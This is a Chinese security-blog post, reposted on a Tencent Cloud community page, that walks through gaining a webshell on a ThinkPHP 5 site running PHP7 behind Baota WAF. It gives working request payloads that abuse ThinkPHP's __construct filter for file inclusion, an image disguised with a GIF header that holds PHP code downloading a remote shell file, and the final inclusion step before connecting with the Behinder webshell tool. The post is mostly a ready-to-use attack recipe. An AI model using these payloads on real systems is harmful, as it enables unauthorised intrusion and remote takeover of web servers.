前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【奇思淫技】TP5最新getshell漏洞

【奇思淫技】TP5最新getshell漏洞

作者头像
Ms08067安全实验室
发布2019-09-24 15:37:57
1.7K1
发布2019-09-24 15:37:57
举报
ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。

0X00 基本环境

确定目标存在tp5的漏洞,经过后期的探测发现安装有宝塔WAF。

基本环境为:php7 + 宝塔waf

因为php7之后基本确定舍弃了函数assert(),因此有关于assert的所有payload全部失效!!! 虽然网上有很多关于tp5+php7的文章,但是我尝试之后全部失败。

0x01 另辟蹊径

因为之前payload所显示的phpinfo不全,那我们换一种方式!

得出关键信息:

代码语言:javascript
复制
disable_functions:

passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru

得出关键信息:

代码语言:javascript
复制
网站绝对路径:/www/wwwroot/site

过程不多说!老规矩!

文件包含,payload: _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/www/wwwroot/site/public/robots.txt

正好找到了该站的编辑器。(ueditor默认路径) 那么我们现在只需要构造包含内容即可。

代码语言:javascript
复制
GIF98a
代码语言:javascript
复制
<?php phpinfo(); ?>
代码语言:javascript
复制
<?php copy("http://url/shell.txt","test.php");?>

添加phpinfo是为了看代码是否正确的执行了,但如果你有自信认为一定成功,那随意。

上传图片,得到路径。

继续。

代码语言:javascript
复制
payload:

_method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/site/public/upload/20190322/c627cb130d82cb2f9c5bf4575850cf79.jpg&method=get&server[]=

注意:路径一定要正确!!!

冰蝎连接shell。

收工。

作者:曲云杰

来源:Ms08067安全实验室

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-04-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档